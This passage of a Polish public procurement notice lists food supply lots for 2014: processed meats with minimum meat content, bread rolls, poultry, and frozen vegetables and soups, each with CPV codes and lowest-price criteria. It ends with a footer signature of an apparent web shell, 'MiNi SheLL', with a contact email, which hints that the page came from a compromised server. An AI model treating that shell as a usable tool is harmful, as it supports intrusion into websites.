Bok wędzony co najmniej                       70% mięsa wieprzowego 
Golonka prasowana co najmniej 70%mięsa wieprzowego
Karkówka grilowa co najmniej 70%mięsa wieprzowego
                                                                              Karkówka pieczona co najmniej 80%mięsa wieprzowego
Kaszanka (co najmniej:                    wątroba 15%, płuca15%,skórki wieprzowe15%, tłuszcz 15%,mięso wieprzowe15% krew, kasza jęczmienna, kasza gryczana)
Kebabki  co najmniej                       mięso wieprzowe 80%                                   mięso wołowe20%
Kiełbasa biała co najmniej 70%mięso wieprzowe20% mięsa wołowego
Kiełbasa firmowa co najmniej   70% mięso wieprzowe 
Kiełbasa krakowska  co najmniej                        mięso wieprz 70%                                           mięso  wołowe14%
Kiełbasa parówkowa co najmniej  mięso wieprzowe60%wołowe20%
Kiełbasa piwna  co najmniej                               mięso wieprzowe70%                wołowe 30%
Kiełbasa zwyczajna co najmniej mięso wieprzowe 60% wołowe 30%
Kiełbasa golonkowa    co najmniej                      mięso  wieprzowe  80%
Kiełbasa podwawelska                        co najmniej mięso wieprz 70% mięso wołowe 20%
Kiełbasa swojska   co najmniej                                  mięso wieprz 80% wołowe 20%
Kiełbasa szynkowa co najmniej mięso wieprzowe 60% mięso wołowe 20%
Kiełbasa żywiecka co najmniej mięso wieprzowe 70%                  wołowe 20%
Kiełbasa grillowa co najmniej  mięso wieprzowe  70%                        15% wołowego
Łopatka myśliwska co najmniej mięso wieprzowe 80%
Mortadela  co najmniej                   mięso  wieprzowe 71% mięso wołowe 15%
Mielonka tyrolska co najmniej mięso wieprzowe57% wołowe15%
Ogonówka co najmniej                   mięso wieprzowe 80%
Pasztet mięsny co najmniej              mięso wieprzowe 70% woł20%
Parówki śląskie co najmniej                         mięso wieprzowe 71%                  wołowe 14%
Pasztetowa  co najmniej                                    podgardle 35%boczek15% wątroba  25%słoninsa 15% 
Pieczeń węgierska co najmniej mięso wieprzowe 70% wołowe15%
Pieczeń cygańska co najmniej   mięsa wieprzowego70% wołowe20%
Rolada schabowa    co najmniej                            80%mięsa wieprzowego
Szynka konserwowa co najmniej 70% mięsa wieprzowego 20% wołowego 
Salceson włoski  co najmniej podgardle20% skórki10% ozór15% uszy15% serce 20%płuca 20%nerki15%
Schab pieczony  co najmniej                            80% mięsa wieprzowego
Szynka wędzona  co najmniej                      80% mięsa wieprzowego
Pachwina wędzona   co najmniej                                     60% mięsa wieprzowego
Pierś wędzona z indyka co najmniej  80% mięsa z indyka 
Polędwica drobiowa  co najmniej                                     80% mięsa drobiowego
Polędwica sopocka   co najmniej                        70%mięsa drobiowego
Pasztet drobiowy co najmniej      75% mięsa drobiowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pieczywo, świeże wyroby piekarskie i ciastkarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka kajzerka 50 g
Bułka  pszenna   60g
Bułka wrocławska 350g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> świeży drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak
Korpus z indyka
Porcja rosołowa
Filet z kurczaka
Korpus drobiowy
Skrzydło drobiowe
Udziedz z indyka
Ćwiartka tylna z kurczaka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> produkty mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł zielony  Hortex                      lub równoważny
Brukselka Hortex                                             lub równoważny             
Fasolka szparagowa zielona  Hortex lub równoważny
Fasolka szparagowa żółta Hortex               lub równoważny
Groszek zielony Hortex                         lub równoznaczny 
Kalafior Hortex                                          lub równoważny
Marchew kostka Zavinex                          lub równoważny
Marchew z groszkiem Hortex                lub równoważny 
Mieszanka warzyw marchew, pietruszka. seler, por,   Hortex                            lub równoważny
Mieszanka królewska marchew, kalafior, fasolka, brukselka, por Agram  lub równoważna 
Barszcz ukraiński Hortex                         lub  równoważny 
Zupa babuni Hortex                               lub równoważny 
Zupa grzybowa z podgrzybkami Hortex lub równoważny 
Zupa fasolowa Hortex                          lub równoważny 
Zupa pieczarkowa Hortex                      lub równoważna 
Zupa ogórkowa Hortex                lub równoważna 
Zupa jarzynowa Hortex                lub równoważny
Śliwka drylowana mrożona  Hortex lub równoważny 
Truskawka mrożona  Hortex      Zavinx    lub równoważny 
Mieszanka owoców mrożonych wiśnia ,truskawka, porzeczka, aronia Hortex  lub równoważny 
Mieszanka kompotowa   Agram          lub równoważna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com